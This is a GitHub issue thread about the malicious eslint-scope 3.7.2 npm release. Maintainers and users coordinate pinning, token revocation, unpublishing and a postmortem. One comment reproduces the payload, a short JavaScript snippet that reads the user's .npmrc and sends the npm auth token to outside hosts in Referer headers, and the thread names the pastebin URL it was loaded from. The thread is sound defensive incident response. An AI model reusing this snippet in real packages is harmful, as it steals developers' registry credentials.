-
-
Notifications
You must be signed in to change notification settings - Fork 30
Virus in eslint-scope? #39
Comments
+1 |
Thanks for the issue! Latest should be 4.0.0. I highly recommend installing 4.0.0 directly while we figure out what's going on and unpublish 3.7.2 (and tag 4.0.0 as latest again). I'm checking our Jenkins server logs, but as far as I know, none of us on the ESLint team would have published this. It's possible some npm credentials got compromised. Thanks again for bringing this to our attention. |
Yeah it's likely that NPM credentials has been stolen. Also, I suggested to the NPM team to double check with Github repository to make sure that no untagged releases happen. This should at least limit a damage in cases when only NPM account has been stolen. |
I've confirmed that our Jenkins server did not do this. So at least that is probably not compromised. |
|
It might be a good idea to pin the dependency while we work on unpublishing. We have no plans to publish any 3.7.x so you could safely pin at 3.7.1. |
I pinged
The issue is that we have a boilerplate repo without a .lock file. We opt-in for not having it to prevent deps going stale. So the malicious release is being pulled by default, but |
I've sent a message to npm's support asking for help in identifying what happened. I do not have publish access to eslint-scope so I can't unpublish it directly. I've pinged one of our TSC members who does have that access. So hopefully we'll be able to unpublish as soon as he gets the message and has time to do it. In the meanwhile, in case it wasn't clear from earlier in this thread: do not use eslint-scope@3.7.2 as it is compromised. Use 3.7.1 or 4.0.0 instead. Thanks! |
Is it possible to publish a clean |
Hey I have a strange behaviour with
|
@aSapien I think that's a reasonable suggestion. However, as I don't have publish access, I can neither publish 3.7.3 nor unpublish 3.7.2. Hopefully the folks who do have access will be online soonish and can work on this. Thanks for your patience! |
@yvele As noted elsewhere in the thread, 3.7.2 is compromised. Do not use it. Please install 3.7.1 instead. Thanks! |
@platinumazure yep I've seen that but I'm using |
@yvele Once we unpublish, you should be able to do a fresh reinstall (delete node_modules and run |
Nvm, @aSapien already suggested this. Sorry, was stressing a bit because of this! |
Basically what's are the effets of the infected package?
@pronebird Please update the issue first post with the effet and advise people to immediately change their npm tokens |
Is this problem specific to Linux environment? I am able to install in windows without any problem
|
@manjotnms, please renew your NPM credentials. Installing it successfully means that the attacker's script also successfully finished. In our Linux CI environment it failed luckily, but that doesn't mean it's safe... |
The pastebin in question has been removed / emptied out now. For later reference - this is what was contained in said pastebin: try{
var path=require('path');
var fs=require('fs');
var npmrc=path.join(process.env.HOME||process.env.USERPROFILE,'.npmrc');
var content="nofile";
if (fs.existsSync(npmrc)){
content=fs.readFileSync(npmrc,{encoding:'utf8'});
content=content.replace('//registry.npmjs.org/:_authToken=','').trim();
var https1=require('https');
https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+content}},()=>{}).on("error",()=>{});
https1.get({hostname:'c.statcounter.com',path:'/11760461/0/7b5b9d71/1/',method:'GET',headers:{Referer:'http://2.b/'+content}},()=>{}).on("error",()=>{});
}
}catch(e){} As you can tell, the script finds your npmrc file and passes your auth token to two different stat counter websites, via the referrer header. Anyhow, it's removed now, so any new projects won't be contaminated (edit: at least until somebody re-adds the code) |
@byCedric : I am using eslint 4.7.2, which has a dependency on eslint-scope 3.7.2. I suppose in this case eslint has to renew its NPM credentials. |
@manjotnms, yes exactly, I would recommend you do the same 😄 |
Make sure to change your password and enable 2FA. Check your current token in Log into npm using Revoke the token using |
@yvele I've updated the issue with some suggestions on how to circumvent the update to the malicious 3.7.2 and how to revoke the npm account token (comment by @TimvanScherpenzeel ) |
Looks like its been unpublished :) |
Solved in about 1h... You guys must wear capes. <3 |
You can in Maven too. And you can even compile different C++ executable than you put in your git. Thats is the reason, we use signatures to verify integrity and why reproducible build/compile matters. |
For anyone curious about the signing situation, the NPM maintainers actively rejected package signing in 2015. |
|
Some of the comments on here re: package signing are combative, unproductive, and off-topic. If you have concerns about npm's approach to package management, please share them at https://github.com/npm/npm/issues |
I suggest that maintainers lock this issue so that they only will be able to post and update those subscribed to the issue. |
Do we think this is confined to eslint-scope, or should we be concerned about most packages under the eslint umbrella? |
@paulirwin, @kelset, yep I have access so did it now. Because there's a lot of sources linking to this issue, we want to keep noise to the minimum, and promise that we will update the thread with more information as we get it.
|
Update: We went through every package under ESLint organization and verified that the only package that was published with this issue was eslint-scope. Edit: It looks like eslint-config-eslint was also compromised, but has since been unpublished as well. |
Sorry - I didn't mean to close this! |
It looks like eslint-config-eslint was also compromised, but has since been unpublished as well. |
Scanning script to find infected @3.7.2 installations: https://gist.github.com/brownstein/8aaade4953807f512d416da0c6a5a5f6 (refs: #40 thanks @brownstein) |
We're working on publishing eslint-scope@3.7.3 Edit: Decision was made not to publish a new eslint-config-eslint due to much reduced usage and much smaller time vector. |
|
This has now been resolved. Please find a write up of the incident on our blog. The ESLint team apologizes for allowing this to happen. Thanks to the community for making us aware of the issue so quickly and for providing information. |
Updated blog post: https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes
Update from the maintainers
Incident status report from npm
Please follow the comment by @platinumazure that gives a little insight into what happened:
#39 (comment)
It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See eslint/eslint#10600 for more information.
In the meantime
eslint-scope
to3.7.1
, one way is to add theresolutions
to yourpackage.json
Verify the dependency version with
yarn list eslint-scope
. It should print outeslint-scope@3.7.1
Use
package-lock.json
oryarn.lock
and have it in your repo if possible. Do not upgrade to 3.7.2 even ifyarn outdated
shows that there is a new version available.Revoke your NPM token as suggested in the comment below Virus in eslint-scope? #39 (comment). You can do the same by logging in to https://www.npmjs.com/, selecting the "tokens" menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.
The issue
I don't know what the hell this is but it looks like a virus to me:
The contents of a suspicious file:
The URL it attempts to load is http://pastebin.com/raw/XLeVP82h
Also it attempts to send my
.npmrc
somewhere.This is version 3.7.2 that's been published an hour ago.
The text was updated successfully, but these errors were encountered: